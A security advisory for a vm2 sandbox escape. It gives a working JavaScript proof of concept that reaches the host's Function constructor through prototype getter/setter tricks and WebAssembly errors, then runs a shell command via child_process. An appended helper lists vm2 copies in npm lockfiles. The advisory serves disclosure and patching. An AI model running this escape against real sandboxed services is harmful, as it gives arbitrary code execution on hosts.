GHSA-v6mx-mf47-r5wg
vm2 has a Sandbox Escape issue
Details
### Summary

By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` error, sandboxed code can obtain the host's `TypeError` constructor, which allows it to escape the sandbox. This allows attackers to run arbitrary code.
### PoC

```js
"use strict";

const { VM } = require("vm2");
const vm = new VM();

vm.run(`
  "use strict";

  const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
  const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");

  async function f() {
    try {
      await WebAssembly.compileStreaming();
    } catch (e) {
      setProto.call(getProto.call(e), null);
    }

    try {
      await WebAssembly.compileStreaming();
    } catch (e) {
      const HostFunction = e.constructor.constructor;
      new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
    }
  }

  f();
`);
```
### Impact

Sandbox Escape → RCE
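To check whether a project pulls in vm2 at all, directly or transitively, the added example below (not part of the advisory or of vm2) walks an npm lockfile and lists every recorded copy with its version and the dependency that nests it. The lockfile objects and version strings are constructed placeholders and `findPackage` is a hypothetical helper name; compare the reported versions against the advisory's affected range, which this page does not list.

```javascript
// Added example: list every copy of vm2 recorded in an npm lockfile.
// Both sample lockfiles are constructed; the version strings are placeholders.
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/some-lib": { version: "2.0.0" },
    "node_modules/vm2": { version: "0.0.0-placeholder", dev: true },
    "node_modules/some-lib/node_modules/vm2": { version: "0.0.1-placeholder" },
    "node_modules/vm2-helper": { version: "1.0.0" }, // similar name, must not match
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    "some-lib": {
      version: "2.0.0",
      dependencies: { vm2: { version: "0.0.1-placeholder" } },
    },
  },
};

// Returns [{ version, via, dev }] where `via` is the chain of packages whose
// node_modules directory holds this copy (empty for a top-level install).
function findPackage(lock, name = "vm2") {
  const hits = [];
  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path.
    for (const [path, meta] of Object.entries(lock.packages)) {
      const parts = path.split("node_modules/");
      if (parts.length < 2 || parts[parts.length - 1] !== name) continue;
      const via = parts.slice(1, -1).map((p) => p.replace(/\/$/, ""));
      hits.push({ version: meta.version, via, dev: Boolean(meta.dev) });
    }
    return hits;
  }
  // lockfileVersion 1: nested `dependencies` objects.
  const walk = (deps, via) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      if (dep === name) hits.push({ version: meta.version, via, dev: Boolean(meta.dev) });
      walk(meta.dependencies, [...via, dep]);
    }
  };
  walk(lock.dependencies, []);
  return hits;
}

for (const h of findPackage(SAMPLE_LOCK_V3)) {
  console.log(`vm2@${h.version} via ${h.via.join(" > ") || "(top level)"}${h.dev ? " [dev]" : ""}`);
}
```

For a real project, pass the parsed contents of `package-lock.json` to `findPackage` in place of the sample objects.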